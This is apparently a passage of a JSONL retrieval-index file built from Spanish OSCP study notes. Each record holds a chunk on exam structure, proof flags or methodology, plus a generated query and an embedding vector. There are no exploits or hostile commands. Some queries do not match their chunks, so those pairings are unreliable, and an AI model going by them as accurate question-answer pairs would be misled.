0.04859, -0.00905, -0.00445, 0.05816, 0.00556, 0.03552, 0.09335, 0.0031, 0.10519, -0.07799, 0.03832, -0.04209, -0.02112, -0.09507, -0.08778, 0.09136, 0.07887, -0.0235, 0.07684, 0.04959, -0.06969, 0.02675, -0.02206, -0.03114, -0.00182, 0.08458, 0.01661, 0.04308, -0.03848, -0.07398, 0.06402, -0.0096, -0.0004, 0.0698, 0.0384, -0.00049, -0.00445, -0.01235, 0.0298, 0.01491, 0.0042, 0.00847, -0.06917, -0.01032, 0.03243, -0.0174, -0.03455, 0.02877, -0.0231, 0.0011, -0.00808, 0.0453, 0.02275, -0.0559, 0.09673, 0.05238, 0.04068, -0.02142, -0.00212, 0.07745, -0.03982, -0.11069, 0.03843, 0.03532, 0.03183, -0.05304, 0.04, 0.03309, 0.03411, 0.02987, 0.03289, 0.04773, -0.02682, -0.05136, -0.06134, 0.02457, 0.02892, -0.02469, -0.07741, 0.05381, -0.03348, -0.01267, -0.02166, 0.03265, 0.01465, -0.06561, 0.02048, 0.00629, 0.00837, 0.05209, 0.01605, -0.06237, -0.03382, -0.03754, 0.05176, -0.0474, -0.05045, 0.00539, -0.01053, -0.0309, -0.03382, 0.00288, 0.00051]} -{"tipo": "pregunta", "herramienta": "Estructura del examen", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Estructura del examen.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## ComposiciΓ³n\n- **Set de Active Directory = 40 puntos seguidos.**\n - 3 mΓ‘quinas **encadenadas**. Si te atascas en la mΓ‘quina 1, no avanzas a 2 y 3.\n - **Empieza por aquΓ­ con tiempo.** Es todo-o-nada por cadena.\n - Ver Active Directory para el flujo completo.\n- **3 standalones independientes**, 20 pts cada una.\n - `user` (10 pt = `local.txt`) + `root/system` (10 pt = `proof.txt`).\n - **Saca el `user` de las 3 ANTES** de obsesionarte con el root de una.", "indexar": "que herramienta es mejor para obtener el privilegio root sin bloquear la mΓ‘quina?", "v": [0.11394, -0.0262, -0.15173, -0.18945, -0.01197, -0.06587, -0.05414, -0.00688, -0.05372, -0.05078, -0.05124, -0.03809, 0.11736, -0.01746, 0.06921, 0.01229, -0.12285, -0.03692, -0.12416, 0.02337, 0.03858, -0.10438, -0.02932, -0.02037, -0.0364, 0.03667, 0.03774, 0.11704, -0.25752, 0.08335, 0.00656, -0.04595, 0.12918, -0.07378, -0.02978, -0.05845, 0.05336, 0.09492, 0.06605, 0.04352, -0.011, -0.00646, -0.06571, 0.12531, -0.00519, -0.05419, 0.05484, 0.09043, 0.06845, 0.03853, 0.05041, -0.2272, -0.05893, -0.02278, 0.05041, -0.06584, 0.15275, -0.04154, -0.05449, -0.00084, -0.15418, -0.06455, -0.04282, -0.04126, -0.02566, -0.00708, 0.01578, -0.1111, -0.00063, 0.06534, -0.03594, -0.02036, 0.08147, 0.0025, 0.05057, 0.03463, 0.00233, 0.01608, 0.03201, -0.00687, 0.09475, 0.00793, -0.04758, 0.00203, -0.03867, 0.01844, -0.00826, 0.01451, -0.04317, -0.12251, 0.01612, 0.13564, -0.02595, -0.02554, 0.13291, -0.0275, 0.10053, 0.03931, -0.0147, 0.00213, 0.2341, -0.0922, -0.05911, 0.12466, 0.04716, -0.00198, 0.03976, -0.08443, -0.02284, -0.05692, -0.04674, -0.00289, 0.01287, 0.05189, -0.02496, 0.04188, -0.08633, -0.01291, -0.02261, -0.11143, -0.02882, -0.00987, -0.07708, -0.10819, 0.07203, -0.01202, -0.04568, 0.10019, -0.03506, -0.0481, -0.04916, -0.03909, 0.00272, 0.04264, -0.04924, 0.00687, 0.02491, -0.1241, -0.03066, -0.0887, 0.03723, 0.01017, -0.04917, -0.10135, 0.04947, -0.04177, 0.00195, -0.05316, -0.06039, -0.0806, 0.00424, -0.13747, 0.03415, 0.03249, -0.09151, 0.00844, -0.11392, 0.00361, -0.00344, 0.10782, -0.05139, -0.11263, -0.1181, 0.04274, -0.03733, -0.0061, 0.02955, 0.00562, 0.01276, -0.00803, 0.00506, 0.00471, 0.02564, 0.01428, -0.09498, -0.03053, 0.04938, 0.03716, 0.04836, -0.01031, -0.02942, 0.03822, 0.01773, -0.09554, -0.02546, 0.03475, 0.03715, 0.00455, 0.05686, -0.00557, 0.05929, 0.03111, 0.01895, -0.02679, 0.05114, 0.00473, -0.01286, 0.02437, 0.04837, 0.02028, -0.03748, -0.00051, -0.02573, -0.02726, -0.00031, -0.01016, 0.02403, -0.1022, -0.05359, 0.03787, 0.01249, 0.03297, -0.00548, -0.03533, 0.02196, 0.00388, -0.03334, 0.00397, -0.03359, -0.03959, 0.01713, 0.00616, 0.02687, 0.03961, 0.00196, -0.02746, 0.00093, -0.00134, 0.06582, 0.00794, 0.00822, -0.03226, 0.02649, 0.00377, 0.01433, -0.0064, 0.01897, -0.05225, 0.00019, -0.02614, -0.00256, 0.02916, 0.05574, -0.06557, -0.02687, 0.01377, -0.01593, -0.04647, -0.03225, -0.07845, 0.05085, 0.00939, 0.06089, 0.01257, 0.02089, 0.04983]} -{"tipo": "pregunta", "herramienta": "Estructura del examen", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Estructura del examen.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Pruebas (flags)\n- `local.txt` = prueba de usuario.\n- `proof.txt` = prueba de root/SYSTEM.\n- Cada flag con el **hostname visible** (`ipconfig` / `ifconfig`) en la captura.", "indexar": "que herramienta sirve para extraer los hostnames visibles de un archivo de texto?", "v": [0.25206, -0.02423, -0.13659, -0.18697, 0.11069, -0.11041, -0.05948, -0.12669, 0.11139, -0.06656, -0.08862, -0.11277, -0.00027, -0.00543, 0.11609, 0.00092, 0.19744, -0.12508, 0.00585, 0.05508, 0.00512, 0.05367, -0.11659, 0.03203, -0.0891, -0.03334, -0.02671, 0.04048, -0.20781, 0.05339, 0.00093, 0.00342, -0.00345, -0.02804, -0.06521, -0.01117, -0.01725, -0.01062, -0.12129, 0.10587, 0.072, 0.07474, -0.07665, 0.05167, -0.1626, -0.03487, -0.02712, 0.0296, 0.0292, -0.01274, -0.01332, -0.13191, -0.18688, 0.01505, -0.04394, -0.09151, 0.13936, -0.10455, -0.04261, 0.00386, -0.05999, 0.01285, -0.0373, -0.02995, -0.0851, -0.02214, -0.00922, 0.0553, -0.19838, 0.01372, -0.10078, 0.07441, 0.1388, -0.00042, 0.03093, 0.05151, -0.01281, -0.07883, 0.00813, -0.00684, 0.0193, -0.02407, -0.06918, 0.02831, -0.08187, -0.08196, 0.01287, -0.04087, 0.03646, -0.04249, 0.11132, 0.05943, 0.01817, 0.03178, 0.00687, -0.02422, 0.06828, -0.00173, 0.00094, -0.00777, 0.09197, -0.03844, -0.02185, 0.11376, 0.1335, 0.0553, -0.00038, -0.02473, -0.05961, -0.0532, 0.11603, -0.04673, -0.03508, 0.04506, -0.06958, 0.00144, -0.05953, 0.04143, -0.00135, -0.05017, -0.04352, -0.06011, -0.02749, 0.01852, 0.00848, -0.07165, -0.08841, 0.02485, -0.04166, -0.06955, -0.04023, 0.03572, -0.07557, -0.00952, -0.02198, -0.03353, 0.02195, -0.06283, 0.02506, -0.01431, 0.04262, 0.02312, -0.05262, 0.01598, 0.05498, -0.00404, -0.017, -0.02444, 0.01988, -0.07063, 0.00929, -0.03771, -0.02415, 0.00169, -0.08666, 0.03338, -0.0253, -0.02483, -0.12953, 0.01039, -0.07021, -0.05135, 0.00275, -0.02228, 0.035, -0.04163, -0.0272, 0.00633, 0.07817, -0.00947, 0.03056, 0.01943, -0.00853, -0.09578, -0.03384, -0.00272, -0.01376, -0.057, -0.0053, -0.03845, -0.02553, -0.01953, -0.00594, 0.02551, -0.00628, -0.02786, 0.05741, -0.07159, -0.06296, -0.01777, -0.04484, 0.03796, -0.0485, -0.00826, -0.0044, -0.00707, -0.0704, -0.03905, 0.00885, -0.03425, -0.06799, -0.04957, 0.01315, -0.02514, 0.02353, 0.03923, -0.05909, 0.01466, -0.04953, 0.05861, 0.01955, 0.0233, 0.05024, -0.00915, -0.03796, -0.00308, 0.04627, 0.00383, -0.00748, -0.01789, 0.05903, -0.0052, 0.11023, -0.04746, 0.03198, 0.01971, 0.05845, 0.04544, -0.00756, -0.04056, 0.01915, 0.01747, -0.04774, -0.01506, 0.03367, -0.05492, 0.00846, -0.0036, -0.07182, -0.04513, 0.02307, 0.03103, -0.00174, -0.02535, 0.00287, -0.03739, -0.0496, 0.06645, 0.01076, -0.07323, -0.06368, -0.0515, 0.06372, -0.02697, 0.02465, -0.02791]} -{"tipo": "pregunta", "herramienta": "Estructura del examen", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Estructura del examen.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Pruebas (flags)\n- `local.txt` = prueba de usuario.\n- `proof.txt` = prueba de root/SYSTEM.\n- Cada flag con el **hostname visible** (`ipconfig` / `ifconfig`) en la captura.", "indexar": "con que puedo filtrar y mostrar solo las lΓ­neas que contienen informaciΓ³n de red como ipconfig o ifconfig?", "v": [0.10722, 0.07344, -0.10564, -0.14004, 0.1951, -0.17977, 0.01014, 0.03526, -0.16183, -0.04221, -0.06078, -0.05839, -0.0327, -0.1088, 0.06094, 0.01509, -0.03914, -0.07366, 0.05728, -0.08145, -0.05942, 0.05402, -0.1328, -0.03354, -0.02303, 0.06489, 0.07899, -0.0464, -0.16005, -0.10084, -0.07436, -0.0263, 0.04783, 0.02084, -0.15981, 0.01879, 0.01592, 0.10655, -0.04763, 0.02353, -0.04555, 0.00566, -0.03726, 0.08556, 0.05891, -0.06913, -0.04125, -0.02929, 0.03939, -0.05965, -0.07088, -0.10844, -0.02786, 0.01206, -0.11245, -0.01697, 0.12452, -0.14533, 0.11065, 0.01021, -0.0526, -0.01404, 0.03159, 0.11969, 0.02965, 0.09169, -0.08307, 0.00898, -0.05887, -0.05421, 0.0113, -0.00837, -0.09795, 0.00505, 0.04073, 0.07042, 0.01335, -0.03906, 0.19086, 0.02861, 0.01233, 0.00828, -0.10487, -0.01846, -0.09407, -0.06532, -0.03212, -0.04503, -0.06323, -0.13725, 0.08168, -0.04656, -0.03565, 0.06367, 0.09593, -0.02811, 0.02113, 0.049, 0.05787, -0.06293, -0.02339, 0.0805, -0.0997, 0.10463, 0.04796, 0.05679, 0.1025, -0.06538, -0.00117, -0.0566, -0.03077, 0.01567, 0.03851, -0.07762, 0.04789, -0.12792, 0.03106, -0.01461, -0.02351, -0.06916, -0.08363, -0.02091, 0.00167, 0.02404, 0.03244, 0.054, -0.00888, 0.02892, 0.05213, 0.02362, -0.05053, 0.01925, -0.03551, -0.08205, -0.08479, 0.00067, -0.0742, -0.03152, -0.01982, -0.06899, 0.08712, 0.09422, -0.02966, 0.00064, 0.1076, 0.01755, -0.05518, -0.08092, -0.07806, 0.02672, 0.04231, 0.04079, -0.031, 0.03286, -0.0898, 0.06367, 0.04353, -0.00204, 0.02314, 0.04755, -0.03662, -0.0196, -0.04596, -0.00726, 0.04746, 0.01298, -0.10177, 0.00421, 0.12932, -0.02047, -0.01608, 0.07412, -0.05557, -0.0608, -0.07559, -0.07961, -0.04522, -0.00901, 0.06421, 0.02101, -0.01778, -0.01743, 0.01791, -0.02374, -0.04668, -0.01221, -0.06949, -0.06021, 0.01396, -0.01255, 0.04287, 0.00874, -0.03782, 0.02141, -0.00276, -0.00813, -0.03451, -0.00314, 0.01071, -0.03346, -0.04959, 0.04753, -0.01789, -0.01736, 0.02261, 0.02037, -0.00483, 0.02566, 0.01734, 0.06284, 0.0841, -0.06365, 0.08296, -0.04631, -0.12309, 0.01799, 0.07677, -0.01878, 0.00799, 0.032, 0.05137, 0.02197, 0.04205, -3e-05, -0.00275, -0.01148, 0.03422, -0.03884, 0.0247, 0.01791, -0.00321, 0.04221, -0.04013, -0.04845, 0.04104, -0.00647, 0.05061, -0.01014, -0.04393, -0.04058, 0.01153, 0.03002, 0.02937, -0.069, 0.02347, -0.03814, -0.12616, 0.00903, 0.04306, -0.07031, -0.02155, 0.02323, 0.08218, -0.0271, -0.0115, -0.03215]} -{"tipo": "pregunta", "herramienta": "Estructura del examen", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Estructura del examen.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Pruebas (flags)\n- `local.txt` = prueba de usuario.\n- `proof.txt` = prueba de root/SYSTEM.\n- Cada flag con el **hostname visible** (`ipconfig` / `ifconfig`) en la captura.", "indexar": "cual es una alternativa libre a scripts complejos para analizar logs y buscar patrones especΓ­ficos en archivos?", "v": [0.14689, 0.08095, -0.10056, -0.14756, -0.0445, -0.15937, 0.06825, -0.11626, -0.13578, -0.04867, -0.00201, -0.06674, -0.00918, -0.03783, 0.16682, -0.11163, 0.03583, -0.12219, 0.10289, 0.03791, -0.08063, -0.00529, -0.08564, -0.00903, -0.05093, -0.17362, 0.06753, 0.01127, -0.12776, 0.03861, -0.14561, 0.08806, 0.05299, -0.0105, -0.04315, 0.08992, 0.05579, 0.07347, -0.04133, 0.05677, -0.00913, -0.01951, -0.15385, 0.04969, 0.01379, -0.1403, -0.07499, 0.02203, -0.01985, -0.04906, -0.02749, 0.0061, -0.07776, 0.04161, 0.05932, -0.10957, 0.03328, -0.10375, 0.01849, 0.0669, -0.12565, 0.07562, 0.06335, -0.00086, 0.12554, 0.02749, 0.05125, -0.0571, -0.09794, 0.01923, -0.01665, 0.04531, -0.02372, 0.00216, 0.03391, 0.11073, -0.01328, -0.02328, -0.01571, 0.04062, 0.04086, -0.10993, 0.02188, 0.09612, -0.09265, -0.0804, -0.0745, -0.02539, -0.04971, -0.03665, 0.1036, -0.0186, -0.00174, 0.08026, -0.00461, -0.01722, 0.14498, 0.06569, 0.05781, 0.04348, -0.11163, -0.03294, -0.02797, 0.13872, 0.07782, 0.06202, 0.00114, 0.00672, -0.05351, -0.01662, 0.00495, 0.02336, 0.05246, 0.05618, -0.0271, -0.05356, -0.02027, -0.00119, -0.04114, -0.04676, -0.00377, 0.02523, -0.07694, -0.04816, -0.01414, -0.05203, 0.06652, 0.03628, 0.01731, 0.09256, -0.02924, 0.02461, -0.20232, -0.06093, -0.1431, 0.03558, 0.1096, 0.03669, -0.04874, 0.01052, 0.03562, 0.03778, 0.02048, 0.04181, 0.15234, 0.00542, -0.03395, -0.05779, -0.07415, -0.03405, -0.02936, 0.01561, -0.014, 0.00341, -0.03655, -0.05335, -0.04064, -0.08034, -0.0779, 0.03177, 0.0622, -0.02913, -0.0587, 0.00365, 0.06361, -0.07664, -0.01635, -0.04042, 0.03907, -0.01484, 0.00206, 0.02513, 0.00145, -0.11471, 0.05795, -0.03838, -0.01578, -0.11923, 0.01123, -0.04931, -0.00915, -0.02037, -0.01011, -0.02072, -0.03951, -0.05675, 0.04336, 0.01331, 0.00678, 0.03056, 0.02404, 0.0149, -0.05388, -0.0379, 0.01199, 0.01556, -0.0321, -0.03415, -0.03489, -0.0104, -0.05201, 0.07516, 0.00296, -0.02866, 0.0506, 0.0542, -0.05805, 0.00366, 0.03083, -0.00115, 0.05716, 0.01301, 0.06299, -0.03667, -0.09289, -0.03666, 0.00345, 0.047, 0.02228, 0.01107, 0.0578, 0.03351, 0.05986, -0.03512, -0.02073, 0.02098, 0.03792, 0.01514, -0.02714, 0.01992, -0.01997, 0.00548, -0.07465, 0.03633, 0.02698, 0.00437, -0.01292, 0.00166, -0.01126, -0.04063, 0.03559, 0.09075, -0.00619, -0.03482, -0.05394, -0.05077, -0.09031, 0.03364, 0.01093, -0.03335, -0.01038, 0.04468, 0.01093, -0.01223, 0.07497, -0.01064]} -{"tipo": "pregunta", "herramienta": "Estructura del examen", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Estructura del examen.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Anti-pΓ‘nico\n- Ver GestiΓ³n del tiempo y Trampas de enumeraciΓ³n.\n- Sin Reporte OSCP **no apruebas**, aunque saques 100 puntos tΓ©cnicos.\n\nRelacionado: MetodologΓ­a OSCP Β· Reglas de herramientas Β· OSCP MOC", "indexar": "que programa sirve para la gestiΓ³n del tiempo y las trampas de enumeraciΓ³n", "v": [0.04619, 0.09009, -0.11176, -0.2044, 0.09989, 0.01879, 0.02048, 0.01561, 0.00012, 0.0272, -0.07268, 0.02965, 0.07514, -0.02071, 0.00857, 0.10343, 0.04397, -0.10178, 0.16681, 0.06997, -0.02242, 0.00514, 0.00671, 0.00733, -0.11659, -0.07311, 0.03778, -0.16346, -0.1315, 0.0509, 0.00252, 0.06525, 0.08249, -0.20462, 0.08342, 0.01666, 0.00289, 0.00175, 0.01756, 0.09401, 0.03487, -0.02803, -0.03468, -0.01069, 0.03708, -0.02649, 0.06983, 0.03381, 0.01668, 0.0092, -0.20064, 0.00458, -0.00665, -0.09845, 0.03015, -0.10543, -0.04788, -0.15719, -0.07453, -0.04866, -0.03237, 0.00347, 0.03032, -0.02667, 0.00463, -0.01713, 0.0465, -0.03803, 0.00247, 0.06362, 0.02807, -0.01039, -0.00513, -0.02494, -0.03706, -0.08796, 0.01003, 0.05048, 0.03528, -0.06979, -0.00055, -0.0895, -0.02481, 0.10441, -0.08712, 0.01323, 0.11494, 0.02966, -0.04295, 0.00152, -0.02066, 0.09856, 0.06856, 0.0698, 0.06843, -0.08359, 0.07621, 0.00753, 0.12538, 0.08842, 0.08875, -0.10684, -0.14457, 0.12123, -0.10588, 0.21056, 0.12235, -0.0451, -0.00656, -0.01684, -0.04903, -0.04207, -0.04866, -0.04574, -0.03334, -0.01454, 0.01609, 0.0101, 0.02457, -0.05401, -0.08146, -0.02094, -0.10628, 0.04388, 0.11207, -0.00802, 0.01179, 0.05171, 0.01559, 0.05283, -0.00842, 0.00113, -0.06027, 0.01704, -0.03819, -0.07968, 0.01532, 0.07158, 0.06886, -0.04028, -0.03506, 0.13351, -0.01064, 0.00937, 0.01291, -0.03355, 0.01931, -0.07973, 0.04335, 0.05064, 0.01421, -0.01785, 0.06371, 0.12613, -0.02534, -0.04696, 0.04586, 0.05509, -0.11866, 0.03778, -0.09043, -0.01937, -0.01266, -0.0481, 0.08477, -0.02475, 0.02412, 0.0623, 0.06353, 0.03045, -0.02729, 0.04828, -0.00634, -0.02987, -0.03805, -0.03678, -0.02768, -0.03907, -0.02122, -0.01807, -0.03248, -0.01671, 0.03646, 0.0562, -0.02251, -0.0577, -0.06835, 0.02046, -0.02848, 0.01869, 0.03546, -0.06582, 0.00261, -0.00599, -0.05087, -0.02971, 0.00771, 0.01388, 0.01409, -0.04231, -0.05323, -0.00246, 0.02821, 0.0178, 0.01245, 0.11172, -0.0095, 0.03616, 0.03894, 0.12236, 0.0319, 0.03199, 0.02761, 0.01069, -0.02927, -0.05149, 0.02433, 0.0396, 0.01098, 0.00715, 0.00136, 0.01664, 0.03789, 0.0805, -0.04305, -0.0809, 0.04818, 0.08226, 0.06056, 0.04024, -0.06174, -0.05961, 0.01047, -0.02934, -0.00526, -0.08238, 0.02732, -0.05359, 0.00511, -0.10258, -0.04183, 0.0909, -0.01417, -0.04575, -0.04642, 0.00807, -0.06915, -0.00189, 0.03147, -0.06122, -0.03124, -0.02213, 0.00562, -0.01041, 0.03951, 0.01557]} -{"tipo": "pregunta", "herramienta": "Estructura del examen", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Estructura del examen.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Anti-pΓ‘nico\n- Ver GestiΓ³n del tiempo y Trampas de enumeraciΓ³n.\n- Sin Reporte OSCP **no apruebas**, aunque saques 100 puntos tΓ©cnicos.\n\nRelacionado: MetodologΓ­a OSCP Β· Reglas de herramientas Β· OSCP MOC", "indexar": "cual es una alternativa libre a los programas que se usan en el reporte OSCP", "v": [-0.02469, 0.00321, -0.05369, -0.0425, -0.04164, -0.19342, 0.05177, -0.08788, -0.14484, -0.02432, -0.07246, -0.16698, -0.02923, 0.02379, 0.03644, -0.04043, 0.04437, 0.03572, 0.11227, 0.00378, -0.10397, -0.04246, -0.0972, 0.02297, 0.00651, 0.04424, 0.06671, -0.00195, -0.04718, -0.10322, 0.02965, 0.04864, 0.07302, -0.02025, -0.01346, 0.02784, 0.04687, -0.06657, 0.04288, 0.02282, 0.0277, -0.08153, -0.07408, 0.11092, 0.13417, -0.09001, -0.02435, 0.16218, 0.04927, -0.03435, -0.10579, -0.05489, -0.102, 0.03662, 0.09857, -0.03368, 0.04119, -0.06539, -0.00854, 0.00802, -0.0732, 0.10896, 0.04989, -0.1631, 0.08536, -0.00986, -0.03495, -0.02057, -0.1573, 0.05352, 0.07334, 0.04445, -0.00074, -0.02993, -0.05552, 0.0127, -0.08888, -0.01242, 0.07225, -0.02559, 0.01876, -0.12069, 0.03418, 0.1841, -0.05968, -0.09233, 0.13997, -0.04987, -0.05314, -0.02357, 0.03965, 0.11029, -0.02041, 0.19174, 0.09008, -0.09099, 0.09809, 0.1071, 0.01829, 0.11243, 0.03365, 0.02878, -0.06793, 0.03507, -0.0571, -0.01181, 0.08649, -0.00523, -0.01782, 0.06997, 0.00303, 0.09006, 0.00245, 0.05203, -0.06659, -0.07177, -0.07026, -0.04731, -0.00163, -0.03322, -0.06869, 0.07274, -0.03459, -0.0479, 0.00114, 0.04153, 0.04278, 0.08591, -0.00847, 0.08274, 0.06307, 0.00804, -0.04857, -0.07568, -0.12087, -0.09013, 0.01299, -0.05219, 0.08874, -0.00631, 0.04388, 0.10801, 0.10328, -0.01006, 0.02509, -0.01109, -0.04711, -0.00234, -0.05101, -0.01866, -0.01695, 0.04051, -0.05613, 0.05763, -0.06787, 0.05416, -0.06577, -0.02009, -0.05751, 0.13284, -0.02619, -0.08072, 0.00594, -0.01716, 0.03442, -0.00049, 0.03091, 0.00092, 0.01766, 0.00077, -0.00442, 0.06659, 0.06382, -0.07003, 0.02474, -0.08887, -0.01181, -0.08155, 0.01992, -0.04442, -0.05896, 0.06119, -0.03016, 0.01873, -0.02958, -0.0315, -0.00406, 0.02788, 0.006, 0.00928, -0.04133, 0.04621, -0.03291, -0.07594, -0.04703, -0.0139, 0.01065, -0.07782, 0.07368, -0.03387, -0.0934, -0.00798, -0.03033, -0.03404, 0.02232, 0.02713, -0.03932, 0.0908, 0.0047, 0.08251, 0.01109, -0.04468, 0.047, 0.0014, -0.02032, 0.0245, 0.05008, 0.03813, -0.02659, -0.01385, 0.06091, -0.04182, 0.04654, -0.00782, 0.00257, -0.04492, 0.03636, 0.07671, 0.00544, 0.02904, -0.03895, -0.0046, -0.0126, -0.04539, 0.05367, 0.03468, -0.01896, -0.00879, 0.02232, -0.05093, 0.04862, 0.08441, 0.01503, -0.04845, -0.0305, 0.00219, -0.09194, 0.00979, 0.01044, -0.06461, 0.00863, 0.06605, 0.08283, -0.02814, 0.03553, 0.01785]} -{"tipo": "pregunta", "herramienta": "Estructura del examen", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Estructura del examen.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Anti-pΓ‘nico\n- Ver GestiΓ³n del tiempo y Trampas de enumeraciΓ³n.\n- Sin Reporte OSCP **no apruebas**, aunque saques 100 puntos tΓ©cnicos.\n\nRelacionado: MetodologΓ­a OSCP Β· Reglas de herramientas Β· OSCP MOC", "indexar": "con que puedo montar un estudio de penetraciΓ³n sin tener el reporte oficial", "v": [0.12438, 0.09175, -0.32164, -0.07332, 0.02956, 0.00246, 0.02334, -0.033, -0.10026, -0.07995, -0.12575, 0.01485, 0.08483, -0.05032, -0.00962, 0.0739, 0.00931, -0.04575, 0.025, -0.0326, -0.00804, -0.09243, 0.02406, -0.05163, 0.02348, 0.1167, -0.0212, 0.00114, -0.06436, -0.10498, -0.00011, 0.03824, 0.07065, 0.03963, -0.01372, -0.11426, 0.06122, -0.02095, -0.04898, 0.11842, 0.00159, -0.13369, 0.006, 0.0442, 0.14321, -0.04459, -0.01754, 0.01769, -0.05517, 0.04373, 0.11939, 0.16002, -0.01623, 0.0309, -0.12933, -0.12113, 0.08864, -0.00603, 0.14868, -0.06578, 0.02944, 0.11341, 0.02861, 0.02559, 0.09306, -0.00205, 0.06622, 0.06755, -0.07188, 0.01178, 0.11793, -0.03542, 0.06281, -0.01994, -0.10328, -0.02847, -0.08837, 0.02046, -0.0015, 0.01204, 0.04893, 0.00873, -0.04041, 0.04856, -0.07726, -0.04561, 0.00592, -0.08574, 0.04714, -0.06423, -0.03723, 0.11119, -0.06522, 0.04879, 0.06162, -0.07815, 0.08625, 0.00565, 0.00611, -0.06133, -0.00129, 0.02209, 0.00188, 0.14596, 0.0669, -0.03294, -0.00159, -0.06223, -0.00674, 0.01304, 0.02222, 0.08072, -0.19136, -0.02293, -0.09399, -0.03011, -0.07099, 0.02051, -0.06933, -0.07588, -0.06512, 0.02228, 0.05946, 0.04139, -0.18323, -0.08141, 0.05987, 0.04296, -0.02282, 0.01927, 0.07589, 0.02562, 0.0118, 0.0243, 0.01328, -0.00248, -0.04565, -0.03144, -0.03021, 0.0067, 0.04726, 0.08633, -0.02617, -0.0718, 0.00775, 0.09749, -0.04503, -0.00534, -0.06534, 0.01202, -0.02651, 0.05792, -0.04264, 0.01885, 0.00639, 0.00197, 0.0674, -0.04415, 0.05749, 0.09436, -0.00773, 0.03054, -0.01715, -0.04284, 0.05233, 0.0135, -0.02813, -0.05969, 0.07032, -0.01572, -0.04905, -0.00213, 0.05294, -0.07683, 0.04248, -0.04224, -0.00852, -0.07031, 0.02266, -0.02828, 0.00357, 0.01832, -0.08682, -0.01152, -0.02052, 0.09481, 0.03179, 0.00783, -0.04185, 0.08583, 0.00583, -0.0029, 0.02306, 0.04864, 0.09317, -0.05031, 0.00355, 0.02969, 0.07465, -0.04447, -0.01343, 0.01757, 0.02898, -0.03309, 0.08196, -0.04887, -0.05489, 0.0281, 0.0232, 0.00686, 0.01681, -0.08609, -0.0441, -0.10524, -0.00613, -0.01897, 0.06147, 0.02735, -0.07362, 0.0299, 0.02865, -0.00272, 0.08191, 0.01132, -0.01088, 0.01284, 0.00174, -0.00739, -0.01418, 0.02372, -0.01163, 0.0113, -0.08356, -0.05895, 0.05002, 0.01111, -0.01042, 0.02109, -0.02882, 0.01508, 0.04174, 0.01658, 0.05714, 0.03586, -0.06109, -0.07163, -0.0151, 0.06691, 0.00026, -0.11712, 0.01448, 0.04478, 0.03579, -0.06802, 0.00789, -0.0369]} -{"tipo": "pregunta", "herramienta": "MetodologΓ­a OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/MetodologΓ­a OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "# MetodologΓ­a OSCP\n\n> El truco real del OSCP no es saber 200 tΓ©cnicas, es tener una **metodologΓ­a repetible**.\n> La gente suspende por **saltarse pasos** o por **obsesionarse con un vector**, no por desconocimiento tΓ©cnico.", "indexar": "que metodologΓ­a hay para resolver certificaciones de seguridad paso a paso", "v": [0.05825, -0.01255, -0.18833, -0.24271, 0.02213, -0.08528, -0.00521, -0.08054, -0.09289, -0.03643, -0.09756, 0.05819, 0.02829, -0.00964, 0.06012, -0.01732, 0.07838, -0.01789, -0.02623, -0.01449, 0.06248, -0.12772, -0.07376, -0.07448, 0.0758, 0.09215, 0.01967, -0.05898, -0.04433, -0.02491, 0.04921, 0.03859, 0.03809, 0.03332, -0.13174, 0.09026, -0.03616, -0.03482, -0.12205, 0.09659, -0.13644, -0.09072, 0.14457, -0.00704, 0.11769, -0.07083, 0.05293, 0.01324, 0.0047, -0.02642, -0.02493, -0.05026, -0.07203, -0.08921, -0.12051, -0.03909, 0.02009, 0.10266, 0.0419, -0.10166, -0.17444, -0.07162, 0.0663, 0.00972, 0.0396, 0.01269, 0.08064, -0.03917, -0.04744, 0.00349, 0.0797, 0.00339, -0.00632, 0.06947, -0.04225, -0.12106, -0.02824, 0.04121, 0.11884, 0.12448, 0.03792, 0.04504, -0.05827, -0.08549, -0.1554, 0.08079, 0.00734, -0.02713, 0.09765, -0.02747, -0.06921, 0.00124, 0.07723, -0.0466, 0.01794, -0.04976, 0.08296, -0.01835, -0.03338, 0.00412, 0.00603, 0.00334, -0.03678, 0.0966, 0.02549, 0.05697, 0.06864, 0.03883, 0.02003, -0.0957, -0.08343, 0.10991, -0.01383, -0.03434, -0.05982, -0.00287, 0.0121, -0.05027, -0.0081, -0.03187, -0.05234, -0.07162, -0.05504, -0.02387, 0.07412, 0.00892, 0.01642, 0.07417, -0.02314, -0.0663, 0.01131, -0.16189, -0.10611, 0.11887, -0.00909, 0.01972, -0.02128, -0.0768, -0.03113, 0.03883, 0.02453, 0.02095, -0.02098, -0.00784, 0.05714, -0.00032, -0.03704, -0.05454, -0.06292, 0.03924, -0.07453, 0.04152, -0.00583, 0.05053, -0.13502, -0.04578, -0.00355, -0.02503, -0.03894, 0.11312, 0.01853, 0.06081, -0.00464, 0.0171, 0.01549, 0.00623, 0.05239, 0.01759, -0.00359, -0.03913, 0.02299, 0.0378, -0.06675, -0.1196, 0.01739, 0.011, -0.00777, -0.16048, 0.03665, -0.04557, -0.02267, -0.03505, 0.00234, -0.03116, 0.08635, -0.07236, 0.02809, 0.02581, 0.02662, 0.10067, 0.01462, 0.00538, -0.08736, -0.02525, -0.12533, 0.03097, 0.01421, -0.04147, -0.0273, -0.02231, -0.02022, 0.00764, 0.01726, -0.00548, 0.03409, 0.05023, -0.00093, 0.05171, -0.01268, 0.02183, 0.04362, -0.02037, 0.05777, -0.0057, -0.04123, -0.04721, -0.04493, 0.00236, -0.05851, 0.02346, 0.05497, 0.0297, -0.01308, 0.0166, -0.02426, 0.02539, -0.00506, -0.02295, -0.02001, 0.03299, -0.00528, -0.00358, -0.10779, 